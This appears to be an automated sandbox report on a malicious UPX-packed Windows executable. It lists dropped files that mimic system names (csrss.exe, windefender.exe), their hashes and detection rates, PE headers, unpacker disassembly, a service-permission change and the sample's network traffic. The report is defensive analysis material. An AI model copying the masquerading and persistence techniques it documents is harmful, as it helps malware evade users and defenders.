                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................|..............................................t...........Rich...................PE..d...l.D`..........".................T..........@..........................................`.....................................................(............`...'..............`...@...8...............................8............................................text...H........................... ..`.rdata...9.......:..................@..@.data...`....0......................@....pdata...'...`...(..................@..@_RDATA...............V..............@..@.rsrc................X..............@..@.reloc..`............Z..............@..B........................................................................................................................................................................................................
                                                                                                  C:\Users\user\Desktop\upd.exe
                                                                                                  Process:C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3788288
                                                                                                  Entropy (8bit):7.892618389779633
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:r1HRHgwXrMeyKVNrb6VryiHiJ+9fCU/3PLg:r1HvrZ9Vlfq1pN3
                                                                                                  MD5:3C3046F640F7825C720849AAA809C963
                                                                                                  SHA1:61AE00EC8041DE7826DECEB176C495AB23392EFB
                                                                                                  SHA-256:3993AA1A1CF9BA37316DB59A6EF67B15EF0F49FCD79CF2420989B9E4A19FFC2A
                                                                                                  SHA-512:64FCA2287D36195C66E11C62292D094ECF7374BCAF931D04AEA5A388F7F67D5588BAE14A79107E61D660E745A17D577D06A69C367408AC48C4A789317D2B2470
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: Metadefender, Detection: 31%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 86%
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........$................9......0R. ....@R.......@.......................... ......................................................................................................................................................................UPX0.....0R.............................UPX1......9..@R...9.................@...UPX2..................9.............@...3.95.UPX!.......-..s.....9..&..&"....... Go build ID: "efKxbRE8zJFH9gxB....7pBf/JfqrRU>jpK8uMrff7Rq/6PoX...onZYEm2XfJCsywwk/P5vIQLaJH_zAA....twCM0QU". ...d...........;a.v ...."....D$...$...`..k..&.........|.....f.......dnl.L$h......m..g$....4..$....,.....\H......1.1.TP....~..|.\Z.;cpu.u.d,.T.@.....iT=........H9.............Y...?.............l.....0.9....lX..?(.|$<).......!..}...$.T..$0............Z..\*f..on....m.......;5al..p7.......M..<W........L....A....9.}..w._.9.-8.9....5...p........
                                                                                                  C:\Windows\Logs\CBS\CBS.log
                                                                                                  Process:C:\Windows\servicing\TrustedInstaller.exe
                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                  Category:modified
                                                                                                  Size (bytes):3080192
                                                                                                  Entropy (8bit):5.314136477236586
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:TLS5YygL1mnGVFQa/qJIxOfTFyKQel5lmhSVjfChq4TMmdqIH:TL1dq
                                                                                                  MD5:1602CB2334DFE1B40AA9BD15E39BA0C2
                                                                                                  SHA1:E8CDC55E0CEC5925B2FAE4581E9A7059C83B6375
                                                                                                  SHA-256:21C8082B81E5F535410DC8BE90DCA278715A735425BDBD61CB081B710168C657
                                                                                                  SHA-512:F54E1400F194F35CA4CD2541FD9DCB27F9D06EC900E63C7EB0A792249BF6B6127666B277329118067F0E4A5BB2733240643D57A7F60C0C67528A7F4059843CD2
                                                                                                  Malicious:false
                                                                                                  Preview: .2019-06-27 00:55:29, Info CBS TI: --- Initializing Trusted Installer ---..2019-06-27 00:55:29, Info CBS TI: Last boot time: 2019-06-27 00:49:51.660..2019-06-27 00:55:29, Info CBS Starting TrustedInstaller initialization...2019-06-27 00:55:29, Info CBS Lock: New lock added: CCbsPublicSessionClassFactory, level: 30, total lock:4..2019-06-27 00:55:29, Info CBS Lock: New lock added: CCbsPublicSessionClassFactory, level: 30, total lock:5..2019-06-27 00:55:29, Info CBS Lock: New lock added: WinlogonNotifyLock, level: 8, total lock:6..2019-06-27 00:55:29, Info CBS Ending TrustedInstaller initialization...2019-06-27 00:55:29, Info CBS Starting the TrustedInstaller main loop...2019-06-27 00:55:29, Info CBS TrustedInstaller service starts successfully...2019-06-27 00:55:29, Info CBS No startup pr
                                                                                                  C:\Windows\rss\csrss.exe
                                                                                                  Process:C:\Users\user\Desktop\upd.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3788288
                                                                                                  Entropy (8bit):7.892618389779633
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:r1HRHgwXrMeyKVNrb6VryiHiJ+9fCU/3PLg:r1HvrZ9Vlfq1pN3
                                                                                                  MD5:3C3046F640F7825C720849AAA809C963
                                                                                                  SHA1:61AE00EC8041DE7826DECEB176C495AB23392EFB
                                                                                                  SHA-256:3993AA1A1CF9BA37316DB59A6EF67B15EF0F49FCD79CF2420989B9E4A19FFC2A
                                                                                                  SHA-512:64FCA2287D36195C66E11C62292D094ECF7374BCAF931D04AEA5A388F7F67D5588BAE14A79107E61D660E745A17D577D06A69C367408AC48C4A789317D2B2470
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: Metadefender, Detection: 31%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 86%
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........$................9......0R. ....@R.......@.......................... ......................................................................................................................................................................UPX0.....0R.............................UPX1......9..@R...9.................@...UPX2..................9.............@...3.95.UPX!.......-..s.....9..&..&"....... Go build ID: "efKxbRE8zJFH9gxB....7pBf/JfqrRU>jpK8uMrff7Rq/6PoX...onZYEm2XfJCsywwk/P5vIQLaJH_zAA....twCM0QU". ...d...........;a.v ...."....D$...$...`..k..&.........|.....f.......dnl.L$h......m..g$....4..$....,.....\H......1.1.TP....~..|.\Z.;cpu.u.d,.T.@.....iT=........H9.............Y...?.............l.....0.9....lX..?(.|$<).......!..}...$.T..$0............Z..\*f..on....m.......;5al..p7.......M..<W........L....A....9.}..w._.9.-8.9....5...p........
                                                                                                  C:\Windows\windefender.exe
                                                                                                  Process:C:\Windows\rss\csrss.exe
                                                                                                  File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2102272
                                                                                                  Entropy (8bit):7.879347868736008
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:1+yuly+dcYwIx9qadRmAYBfo9hazz2Du5VDyn:1Cy+qa9qWmAYBQfazzpDy
                                                                                                  MD5:E0A50C60A85BFBB9ECF45BFF0239AAA3
                                                                                                  SHA1:AE0E12BC885CB5D4D26C49F6AE20ED40313EDF99
                                                                                                  SHA-256:FC8D064E05EBE37D661AECCB78F91085845E9E28CCFF1F9B08FD373830E38B7F
                                                                                                  SHA-512:03D1440B462B872B7AE4FCCBB455FC0C3AB4E9BF13D07726CE2A9FF9CE4A0E7632A45AF4B52265973D51C8C9D6E24CE84EF81FBAD23CDDF04B64F461FA55050D
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Metadefender, Detection: 29%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........K............... ......p-...M...-...M...@...........................M...............................................M.....................................................................................................................UPX0.....p-.............................UPX1...... ...-... .................@...UPX2..........M....... .............@...3.95.UPX!....Y.P....dM... ...K.&'....... Go build ID: "8LgdNw10OMnjnEaf..o.ouob/F_u>d7bw5LzGyMt067q/f_4E....n-IIykrT4Xu-NukD/RUnzYH.IbGfj....1LuaRla". ...d...........;a.v ....'....D$...$...`..k..&...............f.......dnl.L$h......m..g$....4..$....,.....\H......1.1.TP....~..|.\Z.;cpu.u.d,.T.@.....iT=........H9.............Y...?.............l.....0.9....lX..?(.|$<).......!..}...$.T..$0............Z..\*f..on....m.......;5al..p7.......M..$.........L....A....9.}..w._.9.- .9....5...p........
                                                                                                  \Device\Null
                                                                                                  Process:C:\Windows\SysWOW64\sc.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):39
                                                                                                  Entropy (8bit):3.964228182058903
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:fxjRCqjv:ZMc
                                                                                                  MD5:2F1A2A9AA9E93E390CC54C36BDB0561B
                                                                                                  SHA1:BC13C3DAE9A3C2A7E45F08F2EF1BB14893078EC7
                                                                                                  SHA-256:706A0C615566BE5CC8D24596CD765A00BE7D5E036CA006DFBD8DE7BC6F7FA719
                                                                                                  SHA-512:4204246AF86876511D1748734BADD3008297EBBFD2E306BC00AED13BD5F5B2A946A0C5A72F3988429A5A4F09B2BFC4E2406D07E87A6F8FDD90309B2C9CCF97FF
                                                                                                  Malicious:false
                                                                                                  Preview: [SC] SetServiceObjectSecurity SUCCESS..

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
                                                                                                  Entropy (8bit):7.878858503837156
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  • VXD Driver (31/22) 0.00%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:0NlSa5bf55.exe
                                                                                                  File size:2095616
                                                                                                  MD5:ee30d6928c9de84049aa055417cc767e
                                                                                                  SHA1:a2aec2076bdfa92e5cda03443bec7b6c3287b43a
                                                                                                  SHA256:0ab024b0da0436fddc99679a74a26fdcd9851eb00e88ff2998f001ccd0c9016f
                                                                                                  SHA512:dfc5ec66d2917378c5d24c29eeccde315723f45bb08005d723d76ad7c0521637f007c8277c0eaa3568de7d527a6a561b56363be84f72a0ee4c4ee957ee401667
                                                                                                  SSDEEP:49152:xxaU1ag6hb9cFsZYOvexqnKc6I0YwahWWSRy8cpripxC3pUojB:DwgSWF+5e6K54JMRcpmpxaD
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........>K............... .......-.@.M...-...M...@.......................... M............................................

                                                                                                  File Icon

                                                                                                  Icon Hash:00828e8e8686b000

                                                                                                  Static PE Info

                                                                                                  General

                                                                                                  Entrypoint:0x8d0340
                                                                                                  Entrypoint Section:UPX1
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows cui
                                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, RELOCS_STRIPPED
                                                                                                  DLL Characteristics:
                                                                                                  Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:6
                                                                                                  OS Version Minor:1
                                                                                                  File Version Major:6
                                                                                                  File Version Minor:1
                                                                                                  Subsystem Version Major:6
                                                                                                  Subsystem Version Minor:1
                                                                                                  Import Hash:6ed4f5f04d62b18d96b26d6db7c18840

                                                                                                  Entrypoint Preview

                                                                                                  Instruction
                                                                                                  pushad
                                                                                                  mov esi, 006D1015h
                                                                                                  lea edi, dword ptr [esi-002D0015h]
                                                                                                  push edi
                                                                                                  or ebp, FFFFFFFFh
                                                                                                  jmp 00007F41549ACC82h
                                                                                                  nop
                                                                                                  nop
                                                                                                  nop
                                                                                                  nop
                                                                                                  nop
                                                                                                  nop
                                                                                                  mov al, byte ptr [esi]
                                                                                                  inc esi
                                                                                                  mov byte ptr [edi], al
                                                                                                  inc edi
                                                                                                  add ebx, ebx
                                                                                                  jne 00007F41549ACC79h
                                                                                                  mov ebx, dword ptr [esi]
                                                                                                  sub esi, FFFFFFFCh
                                                                                                  adc ebx, ebx
                                                                                                  jc 00007F41549ACC5Fh
                                                                                                  mov eax, 00000001h
                                                                                                  add ebx, ebx
                                                                                                  jne 00007F41549ACC79h
                                                                                                  mov ebx, dword ptr [esi]
                                                                                                  sub esi, FFFFFFFCh
                                                                                                  adc ebx, ebx
                                                                                                  adc eax, eax
                                                                                                  add ebx, ebx
                                                                                                  jnc 00007F41549ACC7Dh
                                                                                                  jne 00007F41549ACC9Ah
                                                                                                  mov ebx, dword ptr [esi]
                                                                                                  sub esi, FFFFFFFCh
                                                                                                  adc ebx, ebx
                                                                                                  jc 00007F41549ACC91h
                                                                                                  dec eax
                                                                                                  add ebx, ebx
                                                                                                  jne 00007F41549ACC79h
                                                                                                  mov ebx, dword ptr [esi]
                                                                                                  sub esi, FFFFFFFCh
                                                                                                  adc ebx, ebx
                                                                                                  adc eax, eax
                                                                                                  jmp 00007F41549ACC46h
                                                                                                  add ebx, ebx
                                                                                                  jne 00007F41549ACC79h
                                                                                                  mov ebx, dword ptr [esi]
                                                                                                  sub esi, FFFFFFFCh
                                                                                                  adc ebx, ebx
                                                                                                  adc ecx, ecx
                                                                                                  jmp 00007F41549ACCC4h
                                                                                                  xor ecx, ecx
                                                                                                  sub eax, 03h
                                                                                                  jc 00007F41549ACC83h
                                                                                                  shl eax, 08h
                                                                                                  mov al, byte ptr [esi]
                                                                                                  inc esi
                                                                                                  xor eax, FFFFFFFFh
                                                                                                  je 00007F41549ACCE7h
                                                                                                  sar eax, 1
                                                                                                  mov ebp, eax
                                                                                                  jmp 00007F41549ACC7Dh
                                                                                                  add ebx, ebx
                                                                                                  jne 00007F41549ACC79h
                                                                                                  mov ebx, dword ptr [esi]
                                                                                                  sub esi, FFFFFFFCh
                                                                                                  adc ebx, ebx
                                                                                                  jc 00007F41549ACC3Eh
                                                                                                  inc ecx
                                                                                                  add ebx, ebx
                                                                                                  jne 00007F41549ACC79h
                                                                                                  mov ebx, dword ptr [esi]
                                                                                                  sub esi, FFFFFFFCh
                                                                                                  adc ebx, ebx
                                                                                                  jc 00007F41549ACC30h
                                                                                                  add ebx, ebx
                                                                                                  jne 00007F41549ACC79h
                                                                                                  mov ebx, dword ptr [esi]
                                                                                                  sub esi, FFFFFFFCh
                                                                                                  adc ebx, ebx
                                                                                                  adc ecx, ecx
                                                                                                  add ebx, ebx
                                                                                                  jnc 00007F41549ACC61h
                                                                                                  jne 00007F41549ACC7Bh
                                                                                                  mov ebx, dword ptr [esi]
                                                                                                  sub esi, FFFFFFFCh
                                                                                                  adc ebx, ebx
                                                                                                  jnc 00007F41549ACC56h
                                                                                                  add ecx, 02h
                                                                                                  cmp ebp, FFFFFB00h
                                                                                                  adc ecx, 02h
                                                                                                  lea edx, dword ptr [eax+eax]

                                                                                                  Data Directories

                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x4d10000x88UPX2
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                  Sections

                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  UPX00x10000x2d00000x0unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  UPX10x2d10000x2000000x1ff600unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                  UPX20x4d10000x10000x200False0.193359375data1.38215794943IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                                                                                                  Imports

                                                                                                  DLLImport
                                                                                                  KERNEL32.DLLLoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect

                                                                                                  Network Behavior

                                                                                                  Network Port Distribution

                                                                                                  TCP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Nov 4, 2021 13:12:36.557101011 CET49749443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.557152033 CET44349749172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.557259083 CET49749443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.558861971 CET49749443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.558887005 CET44349749172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.610423088 CET44349749172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.610797882 CET49749443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.610841990 CET44349749172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.612529993 CET49749443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.612550974 CET44349749172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.614507914 CET44349749172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.614600897 CET49749443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.618571997 CET49749443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.618782997 CET44349749172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.618983984 CET49749443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.619014978 CET44349749172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.668833017 CET49749443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.672497988 CET44349749172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.672568083 CET44349749172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.672615051 CET49749443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.676929951 CET49749443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.676969051 CET44349749172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.677017927 CET49749443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.714660883 CET49750443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.714709997 CET44349750172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.714850903 CET49750443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.717020988 CET49750443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.717041969 CET44349750172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.757834911 CET44349750172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.758256912 CET49750443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.758284092 CET44349750172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.759229898 CET49750443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.759243011 CET44349750172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.760400057 CET44349750172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.760478020 CET49750443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.763972998 CET49750443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.764090061 CET44349750172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.764242887 CET49750443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.764257908 CET44349750172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.820043087 CET44349750172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.820137024 CET49750443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.822268963 CET49750443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.822297096 CET44349750172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.822335958 CET49750443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.822344065 CET44349750172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.861944914 CET49751443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.861980915 CET44349751172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.862063885 CET49751443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.864763975 CET49751443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.864782095 CET44349751172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.908588886 CET44349751172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.909116030 CET49751443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.909142017 CET44349751172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.910145998 CET49751443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.910154104 CET44349751172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.911206007 CET44349751172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.911297083 CET49751443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.915786028 CET49751443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.915888071 CET44349751172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.916441917 CET49751443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.916461945 CET44349751172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.976591110 CET44349751172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.976684093 CET49751443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.976864100 CET49751443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:36.976882935 CET44349751172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:37.010561943 CET49752443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:37.010607004 CET44349752172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:37.010710955 CET49752443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:37.012703896 CET49752443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:37.012722015 CET44349752172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:37.055567980 CET44349752172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:37.056288958 CET49752443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:37.056318998 CET44349752172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:37.057332993 CET49752443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:37.057342052 CET44349752172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:37.059230089 CET44349752172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:37.059319973 CET49752443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:37.063277960 CET49752443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:37.063371897 CET44349752172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:37.063509941 CET49752443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:37.063524008 CET44349752172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:37.110887051 CET49752443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:37.113311052 CET44349752172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:37.113385916 CET44349752172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:37.113452911 CET49752443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:37.114943981 CET49752443192.168.2.3172.67.207.136
                                                                                                  Nov 4, 2021 13:12:37.114964008 CET44349752172.67.207.136192.168.2.3
                                                                                                  Nov 4, 2021 13:12:37.273085117 CET49753443192.168.2.3172.67.139.144
                                                                                                  Nov 4, 2021 13:12:37.273121119 CET44349753172.67.139.144192.168.2.3
                                                                                                  Nov 4, 2021 13:12:37.273394108 CET49753443192.168.2.3172.67.139.144
                                                                                                  Nov 4, 2021 13:12:37.274655104 CET49753443192.168.2.3172.67.139.144
                                                                                                  Nov 4, 2021 13:12:37.274667025 CET44349753172.67.139.144192.168.2.3
                                                                                                  Nov 4, 2021 13:12:37.342082977 CET44349753172.67.139.144192.168.2.3
                                                                                                  Nov 4, 2021 13:12:37.342344046 CET49753443192.168.2.3172.67.139.144
                                                                                                  Nov 4, 2021 13:12:37.342377901 CET44349753172.67.139.144192.168.2.3
                                                                                                  Nov 4, 2021 13:12:37.343327999 CET49753443192.168.2.3172.67.139.144
                                                                                                  Nov 4, 2021 13:12:37.343339920 CET44349753172.67.139.144192.168.2.3
                                                                                                  Nov 4, 2021 13:12:37.344435930 CET44349753172.67.139.144192.168.2.3
                                                                                                  Nov 4, 2021 13:12:37.344815016 CET49753443192.168.2.3172.67.139.144
                                                                                                  Nov 4, 2021 13:12:37.347975969 CET49753443192.168.2.3172.67.139.144

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Nov 4, 2021 13:12:36.531829119 CET5391053192.168.2.38.8.8.8
                                                                                                  Nov 4, 2021 13:12:36.551266909 CET53539108.8.8.8192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.693613052 CET6402153192.168.2.38.8.8.8
                                                                                                  Nov 4, 2021 13:12:36.713059902 CET53640218.8.8.8192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.835752010 CET6078453192.168.2.38.8.8.8
                                                                                                  Nov 4, 2021 13:12:36.859380960 CET53607848.8.8.8192.168.2.3
                                                                                                  Nov 4, 2021 13:12:36.984076023 CET5114353192.168.2.38.8.8.8
                                                                                                  Nov 4, 2021 13:12:37.009023905 CET53511438.8.8.8192.168.2.3
                                                                                                  Nov 4, 2021 13:12:37.214611053 CET5600953192.168.2.38.8.8.8
                                                                                                  Nov 4, 2021 13:12:37.239144087 CET53560098.8.8.8192.168.2.3
                                                                                                  Nov 4, 2021 13:12:37.248415947 CET5902653192.168.2.38.8.8.8
                                                                                                  Nov 4, 2021 13:12:37.270955086 CET53590268.8.8.8192.168.2.3
                                                                                                  Nov 4, 2021 13:12:38.957103968 CET4957253192.168.2.38.8.8.8
                                                                                                  Nov 4, 2021 13:12:38.978027105 CET53495728.8.8.8192.168.2.3
                                                                                                  Nov 4, 2021 13:12:40.144921064 CET6082353192.168.2.38.8.8.8
                                                                                                  Nov 4, 2021 13:12:40.164143085 CET53608238.8.8.8192.168.2.3
                                                                                                  Nov 4, 2021 13:12:43.418806076 CET5213053192.168.2.38.8.8.8
                                                                                                  Nov 4, 2021 13:12:43.438608885 CET53521308.8.8.8192.168.2.3
                                                                                                  Nov 4, 2021 13:13:06.565668106 CET5623653192.168.2.38.8.8.8
                                                                                                  Nov 4, 2021 13:13:06.588268995 CET53562368.8.8.8192.168.2.3
                                                                                                  Nov 4, 2021 13:13:06.593276024 CET5652753192.168.2.38.8.8.8
                                                                                                  Nov 4, 2021 13:13:06.616501093 CET53565278.8.8.8192.168.2.3
                                                                                                  Nov 4, 2021 13:13:06.621603012 CET4955953192.168.2.38.8.8.8
                                                                                                  Nov 4, 2021 13:13:06.643345118 CET53495598.8.8.8192.168.2.3
                                                                                                  Nov 4, 2021 13:13:06.713522911 CET5265053192.168.2.38.8.8.8
                                                                                                  Nov 4, 2021 13:13:06.734728098 CET53526508.8.8.8192.168.2.3
                                                                                                  Nov 4, 2021 13:13:06.818048954 CET6329753192.168.2.38.8.8.8
                                                                                                  Nov 4, 2021 13:13:06.840814114 CET53632978.8.8.8192.168.2.3
                                                                                                  Nov 4, 2021 13:13:15.786428928 CET5836153192.168.2.38.8.8.8
                                                                                                  Nov 4, 2021 13:13:15.811979055 CET53583618.8.8.8192.168.2.3
                                                                                                  Nov 4, 2021 13:13:16.257272959 CET5361553192.168.2.38.8.8.8
                                                                                                  Nov 4, 2021 13:13:16.277537107 CET53536158.8.8.8192.168.2.3
